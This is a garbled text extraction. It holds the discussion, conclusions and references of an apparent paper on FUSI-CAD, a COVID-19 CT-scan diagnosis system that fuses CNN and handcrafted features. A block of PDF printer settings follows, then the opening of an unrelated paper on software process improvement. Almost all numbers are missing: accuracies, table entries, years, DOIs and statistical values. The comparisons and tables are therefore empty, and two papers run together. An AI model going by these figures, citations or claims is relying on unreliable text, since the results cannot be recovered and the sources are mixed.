/peerj-cs. on the sars-cov- ct-scan dataset. the accuracy ( %), auc ( . ), sensitivity ( %), specificity ( %), precision ( %), and f score ( %) were higher than the other methods. soares et al. ( ) employed different separate cnns such as; x-dnn, resnet, googlenet, vgg- , and alexnet to classify covid- . they also used adaboosting and decision trees (dt) classifiers, however dt performance was lower than cnn. the highest result was achieved by x-dnn reaching an accuracy of . %, auc of . %, sensitivity of . %, precision of %, and f score of . %. whereas, the authors of panwar et al. ( ) presented a deep transfer learning algorithm that quickens the detection of covid- . this method used gradient weighted class activation mapping (grad-cam) to visualize and plot class activation maps. this can assist in explaining more information about the cnn while carrying out the detection process. an accuracy of %, sensitivity of %, precision of %, and f score of % were attained, which were lower than fusi-cad system because this method used only one type of cnn to perform the detection. on the other hand, pathak, shukla & arya, ( ) proposed a deep bidirectional long short-term memory (lstm) network with mixture density network (dbm) model. a memetic adaptive differential evolution (made) algorithm was employed to tune the hyper-parameters of the dbm model. the model achieved an accuracy of . %, auc of . %, sensitivity of . %, precision of . %, and f score of . %. as it can be noted from table that the authors of soares et al. ( ), panwar et al. ( ) and pathak, shukla & arya ( ) have utilized different individual cnns networks. these authors did not neither fuse several cnns architectures nor combine dl features with handcrafted features. however, the fusi-cad system fused multiple dl features with three hc features, which improved the performance of the cad system and this is considered the main advantage of the fusi-cad system. these results proved the competitiveness of the fusi-cad system compared to other studies. moreover, these results confirmed that the proposed fusi-cad system was capable of overcoming the constraint of using ct images only to diagnose the covid- disease. furthermore, according to what had been stated in colquhoun ( ), ellis ( ), table comparison between the proposed fusi-cad system and the recent related studies on the sars-cov- ct-scan dataset. paper method accuracy (%) auc (%) sensitivity (%) precision (%) f score (%) soares et al. ( ) x-dnn . . . . resnet . . . . googlenet . . . . . vgg- . . . . . alexnet . . . . . decision tree . . . . . adaboost . . . . . panwar et al. ( ) cnn – pathak, shukla & arya ( ) lstm* . . . . . proposed fusi-cad system notes: * lstm: long short-term memory. bold values indicate the highest results. ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. attallah ( ) that for a cad system to be reliable, it must attain a sensitivity larger than or equal to %, specificity more than or equal to %, precision higher than or equal %, and a dor greater than or equal . therefore, the performance of the proposed fusi-cad system as in table verified that it is reliable and can be used to diagnose covid- . this was because the sensitivity, specificity, and precision achieved %, in addition to the dor was . the competing performance of the fusi-cad system revealed the idea of producing a diagnostic software tool by it (information technology) solution companies. this tool can be portable and desirable to the end-user, such as radiologists or specialists, to assist the diagnosis procedure of the covid- . the performance of the proposed fusi-cad system was also compared with the related work presented in table ; it was observed that the cnn constructions were different from those used in the fusi-cad system. concerning the resnet cnn constructions, it was clear that the authors of the related work employed it with several layer architectures as in butt et al. ( ), li et al. ( ), jin et al. ( a, b), song et al. ( b) and ardakani et al. ( ). butt et al. ( ) utilized the resnet- and resnet- cnns to identify covid- samples attaining an accuracy of . %, which was beneath that of the fusi-cad system. this was because they used each network individually to perform the classification. alternatively, jin et al. ( a) did the classification process using resnet- cnn achieving an accuracy of . %, which was lower than the accuracy of the fusi-cad system built with a fewer number of images. li et al. ( ), song et al. ( b) and jin et al. ( b) employed the resnet- cnn reaching an accuracy of . %, %, and . % respectively. the accuracies achieved by li et al. ( ) and song et al. ( b), were much lower than the proposed fusi-cad system. this was because they used individual resnet- networks trained with small amount of input images. however, the accuracy obtained by jin et al. ( b) was higher than li et al. ( ) and song et al. ( b). this was due to the large amount of data employed by jin et al. ( b) method compared to li et al. ( ) and song et al. ( b), but it was still lower than fusi-cad system. the reason for that was that fusi-cad system combined several dl features from cnns architectures with three handcrafted textural analysis features. instead, ardakani et al. ( ) employed resnet- cnn and achieved an accuracy of . %. the reason for this high accuracy was that the authors used very high-resolution images and they divided the images into patches. amyar, modzelewski & ruan ( ) and chen et al. ( ) used the u-net for the segmentation and/or classification procedures, the accuracies achieved were %, and . %, respectively. the high accuracy achieved by chen et al. ( ) was due to the huge number of images used to train their u-nets, but it was still lower than the accuracy of proposed fusi-cad system. this was because fusi-cad system applied the feature fusion process, which enhanced the performance. zheng et al. ( ) used a u-net for segmenting ct images, and then they built a new cnn with eight layers. the accuracy attained . %, which was much lower than achieved in fusi-cad system. furthermore, he et al. ( ) had constructed a cad system for coronavirus diagnosis based on densenet- cnn attaining an accuracy of %. although, the densenet network architecture can perform well in case trained with a huge number of images, ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. which was not the case in he et al. method. on the other hand, the authors of hasan et al. ( ) utilized dl features extracted from a new cnn architecture with a handcrafted feature extracted method and attained an accuracy of . %, which was slightly higher than that that of the fusi-cad system. the reason for the slightly outperformance of hasan et al. ( ) method was that the authors constructed a cnn with few number of convolutional layers to decrease the over-fitting by reducing the cnn construction complexity. conversely, fang et al. ( ) used the handcrafted features only and discarded the advantages of dl techniques and therefore, they attained a low auc of . ( . %). to test and validate the statistical significance of the results obtained, a one-way analysis of variance (anova) test was performed by the repeated fivefold cross-validation procedure. the null hypothesis ho for all classification was that the mean accuracies achieved in each experiment. table shows the results of anova test made for the fused deep features (stage ). table shows the results of anova test made for the fused handcrafted features (stage ). table presents the results of anova test executed for the fused the fusion of the multiple deep features and handcrafted features (fusi-cad). it can be observed from tables – , that the p-values achieved were lower than . . therefore, it can be concluded that there was a statistically significant difference between the results calculated for each stage. also the results of the test verify that fusi-cad is reliable. moreover, the % confidence interval calculated for each stage of the proposed system proves that fusi-cad is reliable. although the fusi-cad system outstanding performance, it still has some limitations. meanwhile, the proposed system can only differentiate between covid- and table the anova test details for the deep feature fusion. source of variation ss df ms f p-value columns . . < . error total . table the anova test details for the handcrafted feature fusion. source of variation ss df ms f p-value columns . . . < . error . . total . table the anova test details for fusi-cad system. source of variation ss df ms f p-value columns . . . < . error . total . ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. non-covid- images, but it is crucial to discriminate covid- cases from other categories of pneumonia as well. in addition, the performance of the fusi-cad system was not compared with a manual diagnosis by a radiologist. future work will focus on extending the model so that it would be able to identify other types of pneumonia, employing imaging techniques such as x-rays and constructing other types of cnns. conclusions numerous studies have proved that ai techniques are capable of assisting radiologists in accurately identifying the novel coronavirus as well as speeding up the diagnosis process. this paper proposed an accurate and fast diagnostic tool called the fusi-cad system for distinguishing covid- from non-covid- cases as an alternative to the laboratory test, which has several drawbacks. fusi-cad system is based on the fusion of four dl features with three types of handcrafted features. the results showed that fusing multiple dl features had increased the performance of the classification model compared to the performance of the model constructed with individual dl features. in addition, the outcomes of this study proved that combining the three handcrafted features had increased the accuracy of the diagnosis of covid- . additionally, the fusi-cad system had proved that fusing multiple dl and handcrafted features had a positive impact on the diagnosis of covid- . furthermore, it revealed its competitive performance compared to similar studies based on the same dataset. consequently, the fusi-cad system can be successfully used by radiologists to expedite the diagnosis procedure of covid- . additionally, the fusi-cad system could help in controlling the present epidemic, accelerate the diagnosis of such virus, deaccelerate its spread, and enable clinicians to enhance the quality of patient management, even in unusual workload circumstances. the fusi-cad system must experience additional field-testing afore radiologists can engage it. moreover, it will probably have to endure regulatory approval by health authorities before its implementation into hospitals. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � dina a. ragab conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � omneya attallah conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: the dataset is available at kaggle: eduardo soares and plamen angelov, “sars-cov- ct-scan dataset.” kaggle, doi . /kaggle/dsv/ . the data was described at: a fully automated deep learning-based network for detecting covid- from a new and large lung ct scan dataset, mohammad rahimzadeh, abolfazl attar, seyed mohammad sakhaei. medrxiv . . . ; doi . / . . . . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ai t, yang z, hou h, zhan c, chen c, lv w, tao q, sun z, xia l. . correlation of chest ct and rt-pcr testing in coronavirus disease (covid- ) in china: a report of cases. radiology ( ):e –e doi . /radiol. . al-shamasneh ar, jalab ha, palaiahnakote s, obaidellah uh, ibrahim rw, el-melegy mt. . a new local fractional entropy-based model for kidney mri image enhancement. entropy ( ): doi . /e . amyar a, modzelewski r, ruan s. . multi-task deep learning based ct imaging analysis for covid- : classification and segmentation. medrxiv doi . / . . . . anitha v, murugavalli s. . brain tumour classification using two-tier classifier with adaptive segmentation technique. iet computer vision ( ): – doi . /iet-cvi. . . ardakani aa, kanafi ar, acharya ur, khadem n, mohammadi a. . application of deep learning technique to manage covid- in routine clinical practice using ct images: results of convolutional neural networks. computers in biology and medicine : . attallah o. . an effective mental stress state detection and evaluation system using minimum number of frontal brain electrodes. diagnostics ( ): – doi . /diagnostics . attallah o, gadelkarim h, sharkas ma. . detecting and classifying fetal brain abnormalities using machine learning techniques. in: th ieee international conference on machine learning and applications (icmla). – . attallah o, karthikesalingam a, holt pj, thompson mm, sayers r, bown mj, choke ec, ma x. a. using multiple classifiers for predicting the risk of endovascular aortic aneurysm repair re-intervention through hybrid feature selection. proceedings of the institution of mechanical engineers, part h: journal of engineering in medicine ( ): – doi . / . attallah o, karthikesalingam a, holt pj, thompson mm, sayers r, bown mj, choke ec, ma x. b. feature selection through validation and un-censoring of endovascular repair survival data for predicting the risk of re-intervention. bmc medical informatics and decision making ( ): – doi . /s - - - . attallah o, sharkas ma, gadelkarim h. . fetal brain abnormality classification from mri images of different gestational age. brain sciences ( ): – doi . /brainsci . ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / https://dx.doi.org/ . /kaggle/dsv/ https://dx.doi.org/ . / . . . http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /e http://dx.doi.org/ . / . . . http://dx.doi.org/ . /iet-cvi. . http://dx.doi.org/ . /diagnostics http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /brainsci https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. attallah o, sharkas ma, gadelkarim h. . deep learning techniques for automatic detection of embryonic neurodevelopmental disorders. diagnostics ( ): – doi . /diagnostics . bai hx, wang r, xiong z, hsieh b, chang k, halsey k, tran tml, choi jw, wang d-c, shi l- b. . ai augmentation of radiologist performance in distinguishing covid- from pneumonia of other etiology on chest ct. radiology ( ): . butt c, gill j, chun d, babu ba. . deep learning system to screen coronavirus disease pneumonia. applied intelligence ( ): doi . /s - - - . capizzi g, sciuto gl, napoli c, polap d, woźniak m. . small lung nodules detection based on fuzzy-logic and probabilistic neural network with bio-inspired reinforcement learning. ieee transactions on fuzzy systems ( ): – doi . /tfuzz. . castellano g, bonilha l, li lm, cendes f. . texture analysis of medical images. clinical radiology ( ): – doi . /j.crad. . . . chato l, chow e, latifi s. . wavelet transform to improve accuracy of a prediction model for overall survival time of brain tumor patients based on mri images. in: ieee international conference on healthcare informatics (ichi). – . chen j, wu l, zhang j, zhang l, gong d, zhao y, hu s, wang y, hu x, zheng b. . deep learning-based model for detecting novel coronavirus pneumonia on high-resolution computed tomography: a prospective study. medrxiv doi . / . . . . cheng z, qin l, cao q, dai j, pan a, yang w, gao y, chen l, yan f. . quantitative computed tomography of the coronavirus disease (covid- ) pneumonia. radiology of infectious diseases ( ): – . chung m, bernheim a, mei x, zhang n, huang m, zeng x, cui j, xu w, yang y, fayad za. . ct imaging features of novel coronavirus ( -ncov). radiology ( ): – doi . /radiol. . colquhoun d. . an investigation of the false discovery rate and the misinterpretation of p-values. royal society open science ( ): doi . /rsos. . depeursinge a, al-kadi os, ross mitchell j. . biomedical texture analysis. first edition. cambridge: academic press. dirvanauskas d, maskeliunas r, raudonis v, damasevicius r. . embryo development stage prediction algorithm for automated time lapse incubators. computer methods and programs in biomedicine : – doi . /j.cmpb. . . . dong d, tang z, wang s, hui h, gong l, lu y, xue z, liao h, chen f, yang f. . the role of imaging in the detection and management of covid- : a review. epub ahead of print april . ieee reviews in biomedical engineering doi . /rbme. . ellis pd. . the essential guide to effect sizes: statistical power, meta-analysis, and the interpretation of research results. cambridge: cambridge university press. fang m, he b, li l, dong d, yang x, li c, meng l, zhong l, li h, li h. . ct radiomics can help screen the coronavirus disease (covid- ): a preliminary study. science china information sciences. ( ): . girshick r, donahue j, darrell t, malik j. . rich feature hierarchies for accurate object detection and semantic segmentation. in: proceedings of the ieee conference on computer vision and pattern recognition. – . hancer e, xue b, zhang m. . differential evolution for filter feature selection based on information theory and feature ranking. knowledge-based systems : – doi . /j.knosys. . . . ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /diagnostics http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tfuzz. http://dx.doi.org/ . /j.crad. . . http://dx.doi.org/ . / . . . http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /rsos. http://dx.doi.org/ . /j.cmpb. . . http://dx.doi.org/ . /rbme. http://dx.doi.org/ . /j.knosys. . . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. hansley ee, segundo mp, sarkar s. . employing fusion of learned and handcrafted features for unconstrained ear recognition. iet biometrics ( ): – doi . /iet-bmt. . . haralick rm, shanmugam k, dinstein i. . textural features for image classification. ieee transactions on systems, man, and cybernetics smc- ( ): – doi . /tsmc. . . hasan am, al-jawad mm, jalab ha, shaiba h, ibrahim rw, al-shamasneh ar. . classification of covid- coronavirus, pneumonia and healthy lungs in ct scans using q-deformed entropy and deep learning features. entropy ( ): doi . /e . he x, yang x, zhang s, zhao j, zhang y, xing e, xie p. . sample-efficient deep learning for covid- diagnosis based on ct scans. medrxiv doi . / . . . . he k, zhang x, ren s, sun j. . deep residual learning for image recognition. in: ieee conference on computer vision and pattern recognition. – . iwasawa t, sato m, yamaya t, sato y, uchida y, kitamura h, hagiwara e, komatsu s, utsunomiya d, ogura t. . ultra-high-resolution computed tomography can demonstrate alveolar collapse in novel coronavirus (covid- ) pneumonia. japanese journal of radiology ( ): – doi . /s - - -y. jin c, chen w, cao y, xu z, zhang x, deng l, zheng c, zhou j, shi h, feng j. a. development and evaluation of an ai system for covid- diagnosis. medrxiv doi . / . . . . jin s, wang b, xu h, luo c, wei l, zhao w, hou x, ma w, xu z, zheng z. b. ai-assisted ct imaging analysis for covid- screening: building and deploying a medical ai system in four weeks. medrxiv doi . / . . . . karthikesalingam a, attallah o, ma x, bahia ss, thompson l, vidal-diez a, choke ec, bown mj, sayers rd, thompson mm. . an artificial neural network stratifies the risks of reintervention and mortality after endovascular aneurysm repair; a retrospective observational study. plos one ( ):e doi . /journal.pone. . kassner a, thornhill re. . texture analysis: a review of neurologic mr imaging applications. american journal of neuroradiology ( ): – doi . /ajnr.a . ke q, zhang j, wei w, po ap d, woźniak m, kośmider l, damaševĭcius r. . a neuro-heuristic approach for recognition of lung diseases from x-ray images. expert systems with applications : – . kolossváry m, karády j, szilveszter b, kitslaar p, hoffmann u, merkely b, maurovich-horvat p. . radiomic features are superior to conventional quantitative computed tomographic metrics to identify coronary plaques with napkin-ring sign. circulation: cardiovascular imaging :e . krizhevsky a, sutskever i, hinton ge. . imagenet classification with deep convolutional neural networks. in: advances in neural information processing systems, toronto: university of toronto, – . lahmiri s, boukadoum m. . hybrid discrete wavelet transform and gabor filter banks processing for features extraction from biomedical images. journal of medical engineering ( ): – doi . / / . lambin p, rios-velazquez e, leijenaar r, carvalho s, van stiphout rg, granton p, zegers cm, gillies r, boellard r, dekker a. . radiomics: extracting more information from medical images using advanced feature analysis. european journal of cancer ( ): – doi . /j.ejca. . . . ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /iet-bmt. . http://dx.doi.org/ . /tsmc. . http://dx.doi.org/ . /e http://dx.doi.org/ . / . . . http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . / . . . http://dx.doi.org/ . / . . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /ajnr.a http://dx.doi.org/ . / / http://dx.doi.org/ . /j.ejca. . . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. lei j, li j, li x, qi x. . ct imaging of the novel coronavirus ( -ncov) pneumonia. radiology ( ): doi . /radiol. . li l, qin l, xu z, yin y, wang x, kong b, bai j, lu y, fang z, song q. . artificial intelligence distinguishes covid- from community acquired pneumonia on chest ct. epub ahead of print march . radiology doi . /radiol. . m.pizer s, amburn ep, daustin j, cromartie r, geselowitz a, greer t, ter haar romeny b, zimmerman jb, zuiderveld k. . adaptive histogram equalization and its variations. computer vision, graphics, and image processing ( ): – doi . /s - x( ) -x. mallat sg. . a theory for multiresolution signal decomposition: the wavelet representation. in: ieee transactions on pattern analysis and machine intelligence. – . nailon wh. . texture analysis methods for medical image characterisation. in: biomedical imaging. london: intech publishing. nanni l, ghidoni s, brahnam s. . handcrafted vs. non-handcrafted features for computer vision classification. pattern recognition : – doi . /j.patcog. . . . nguyen dt, pham td, baek nr, park kr. . combining deep and handcrafted image features for presentation attack detection in face recognition systems using visible-light camera sensors. sensors ( ): doi . /s . panwar h, gupta pk, siddiqui mk, morales-menendez r, bhardwaj p, singh v. . a deep learning and grad-cam based color visualization approach for fast detection of covid- cases using chest x-ray and ct-scan images. chaos, solitons & fractals : . pathak y, shukla pk, arya kv. . deep bidirectional classification model for covid- disease infected patients. in: ieee/acm transactions on computational biology and bioinformatic. paules ci, marston hd, fauci as. . coronavirus infections—more than just the common cold. jama ( ): – doi . /jama. . . pisano ed, zong s, hemminger bm, deluca m, johnston re, muller k, braeuning mp, pizer sm. . contrast limited adaptive histogram equalization image processing to improve the detection of simulated spiculations in dense mammograms. journal of digital imaging ( ): – doi . /bf . ragab da, sharkas m, attallah o. . breast cancer diagnosis using an efficient cad system based on multiple classifiers. diagnostics ( ): . ragab da, sharkas m, marshall s, ren j. . breast cancer detection using deep convolutional neural networks and support vector machines. peerj ( ):e doi . /peerj. . ravì d, wong c, deligianni f, berthelot m, andreu-perez j, lo b, yang g-z. . deep learning for health informatics. ieee journal of biomedical and health informatics : – . sahakyan a, hs. . segmentation of the breast region in digital mammograms and detection of masses. international journal of advanced computer science and applications (ijacsa) : – . shi h, han x, zheng c. . evolution of ct manifestations in a patient recovered from novel coronavirus ( -ncov) pneumonia in wuhan, china. radiology ( ): doi . /radiol. . singh d, kumar v, kaur m. . classification of covid- patients from chest ct images using multi-objective differential evolution-based convolutional neural networks. epub ahead of print april . european journal of clinical microbiology & infectious diseases doi . /s - - -z. ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /s - x( ) -x http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /jama. . http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /s - - -z https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. soares e, angelov p, biaso s, froes mh, abe dk. . sars-cov- ct-scan dataset: a large dataset of real patients ct scans for sars-cov- identification. medrxiv doi . / . . . . song f, shi n, shan f, zhang z, shen j, lu h, ling y, jiang y, shi y. a. emerging novel coronavirus ( -ncov) pneumonia. radiology ( ): – doi . /radiol. . song y, zheng s, li l, zhang x, zhang x, huang z, chen j, zhao h, jie y, wang r. b. deep learning enables accurate diagnosis of novel coronavirus (covid- ) with ct images. medrxiv doi . / . . . . srivastava v, purwar rk. . a five-level wavelet decomposition and dimensional reduction approach for feature extraction and classification of mr and ct scan images. applied computational intelligence and soft computing ( ): – doi . / / . szegedy c, liu w, jia y, sermanet p, reed s, anguelov d, erhan d, vanhoucke v, rabinovich a. . going deeper with convolutions. in: proceedings of the ieee conference on computer vision and pattern recognition. – . vaishya r, javaid m, khan ih, haleem a. . artificial intelligence (ai) applications for covid- pandemic. diabetes & metabolic syndrome: clinical research & reviews ( ): – . wagh kp, vasanth k. . electroencephalograph (eeg) based emotion recognition system: a review. in: saini h, singh r, patel v, santhi k, ranganayakulu s, eds. innovations in electronics and communication engineering. lecture notes in networks and systems. vol. . singapore: springer, – . wang s, kang b, ma j, zeng x, xiao m, guo j, cai m, yang j, li y, meng x. . a deep learning algorithm using ct images to screen for corona virus disease (covid- ). medrxiv preprint wei l, su r, wang b, li x, zou q, gao x. a. integration of deep feature representations and handcrafted features to improve the prediction of n -methyladenosine sites. neurocomputing : – doi . /j.neucom. . . . wei w, zhou b, polap d, woźniak m. b. a regional adaptive variational pde model for computed tomography image reconstruction. pattern recognition : – doi . /j.patcog. . . . wieczorek m, silka j, woźniak m. . neural network powered covid- spread forecasting model. chaos, solitons & fractals : . wu f, zhao s, yu b, chen y-m, wang w, song z-g, hu y, tao z-w, tian j-h, pei y-y, yuan m-l, zhang y-l, dai f-h, liu y, wang q-m, zheng j-j, xu l, holmes ec, zhang y-z. . a new coronavirus associated with human respiratory disease in china. nature : – . xie x, zhong z, zhao w, zheng c, wang f, liu j. . chest ct for typical -ncov pneumonia: relationship to negative rt-pcr testing. radiology ( ):e –e . zhang j, sanderson ac. . jade: adaptive differential evolution with optional external archive. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . zhang j, xia y, xie y, fulham m, feng dd. . classification of medical images in the biomedical literature by jointly using deep and handcrafted visual features. ieee journal of biomedical and health informatics ( ): – doi . /jbhi. . . zheng c, deng x, fu q, zhou q, feng j, ma h, liu w, wang x. . deep learning-based detection for covid- from chest ct using weak label. medrxiv doi . / . . . . ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . . . http://dx.doi.org/ . /radiol. http://dx.doi.org/ . / . . . http://dx.doi.org/ . / / http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /tevc. . http://dx.doi.org/ . /jbhi. . http://dx.doi.org/ . / . . . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. fusi-cad: coronavirus (covid- ) diagnosis based on the fusion of cnns and handcrafted features introduction methods and materials performance evaluation experimental set up results discussions conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice submitted february accepted april published may corresponding author marco kuhrmann, kuhrmann@mmmi.sdu.dk academic editor marlon dumas additional information and declarations can be found on page doi . /peerj-cs. copyright kuhrmann et al. distributed under creative commons cc-by . open access software process improvement: a systematic mapping study on the state of the art marco kuhrmann , philipp diebold and jürgen münch , maersk mc-kinney moller institute—software engineering, university of southern denmark, odense, denmark process engineering, fraunhofer institute for experimental software engineering, kaiserslautern, germany herman hollerith center, böblingen & reutlingen university, böblingen, germany department of computer science, university of helsinki, helsinki, finnland abstract software process improvement (spi) has been around for decades: frameworks are proposed, success factors are studied, and experiences have been reported. however, the sheer mass of concepts, approaches, and standards published over the years overwhelms practitioners as well as researchers. what is out there? are there new trends and emerging approaches? what are open issues? still, we struggle to answer these questions about the current state of spi and related research. in this article, we present results from an updated systematic mapping study to shed light on the field of spi, to develop a big picture of the state of the art, and to draw conclusions for future research directions. an analysis of publications draws a big picture of spi-related research of the past quarter-century. our study shows a high number of solution proposals, experience reports, and secondary studies, but only few theories and models on spi in general. in particular, standard spi models like cmmi and iso/iec , are analyzed, enhanced, and evaluated for applicability in practice, but these standards are also critically discussed, e.g., from the perspective of spi in small-to-medium-sized companies, which leads to new specialized frameworks. new and specialized frameworks account for the majority of the contributions found (approx. %). furthermore, we find a growing interest in success factors (approx. %) to aid companies in conducting spi and in adapting agile principles and practices for spi (approx. %). beyond these specific topics, the study results also show an increasing interest into secondary studies with the purpose of aggregating and structuring spi-related knowledge. finally, the present study helps directing future research by identifying under-researched topics awaiting further investigation. subjects software engineering keywords spi, software process, systematic 